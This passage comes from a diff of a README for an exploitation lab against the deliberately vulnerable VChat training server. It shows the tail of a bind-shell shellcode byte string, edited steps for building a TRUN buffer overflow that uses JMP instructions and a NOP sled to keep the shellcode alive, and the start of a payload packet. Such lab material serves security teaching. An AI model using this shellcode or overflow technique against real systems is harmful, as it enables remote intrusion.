DaintyJet/VChat_GTER_EggHunter/README.md

 	SHELL += b"\x01\x36\xc7\x91\xfa\xcd\xd7\xd0\xff\x8a\x5f\x09"
 	SHELL += b"\x72\x82\x35\x2d\x21\xa3\x1f"
 	```
-5. Generate Shellcode Packet (Python), Due to the structure of the VChat server and how it handles connections, our packet that contains the *bind* shellcode is a bit more complicated.
+3. Generate shellcode packet (Python), Due to the structure of the VChat server and how it handles connections, our packet that contains the *bind* shellcode is a bit more complicated.
-      * In some walkthroughs they do not perform any overflow, this is because the original Vulnserver contains memory leaks where the received data is allocated on the heap, and **is not** de-allocated with a `free()` call.
+   * In some walkthroughs they do not perform any overflow, this is because the original Vulnserver contains memory leaks of a sufficent size where the received data is allocated on the heap, and **is not** de-allocated with a `free()` call.
-      * In VChat, the heap allocations **are** de-allocated, therefore we need to perform an overflow in the **TRUN** buffer as that can hold the shellcode, and prevent the thread that is handling the **TRUN** message from exiting and de-allocating our shellcode.
+   * In VChat, the sufficiently sized heap allocations **are** de-allocated, therefore we need to perform an overflow in the **TRUN** buffer as that can hold the shellcode, and prevent the thread that is handling the **TRUN** message from exiting and de-allocating our shellcode.
-      * We will perform an overflow as is done in the [TURN exploitation](https://github.com/DaintyJet/VChat_TURN), however we will add two `JMP` instructions and a [NOP Sled](https://unprotect.it/technique/nop-sled/), in this case the NOP Sled allows us to jump to an arbitrary location in the buffer, and fall down into the `JMP` instruction placed before the return address allowing us to easily create an infinite loop which prevents de-allocation.
+   * We will perform an overflow as is done in the [TURN exploitation](https://github.com/DaintyJet/VChat_TURN), however we will add two `JMP` instructions and a [NOP Sled](https://unprotect.it/technique/nop-sled/).
+The NOP Sled allows us to jump to an arbitrary location in the buffer, and fall down into the `JMP` instruction placed before the return address allowing us to easily create an infinite loop which prevents de-allocation.
    * We can pick an arbitrary location in the buffer to jump to and assemble the instruction as done in `step 1` of the exploitation procedure.
 	```py
 	PAYLOAD_SHELL = (
     	b'TRUN /.:/' +                        # TRUN command of the server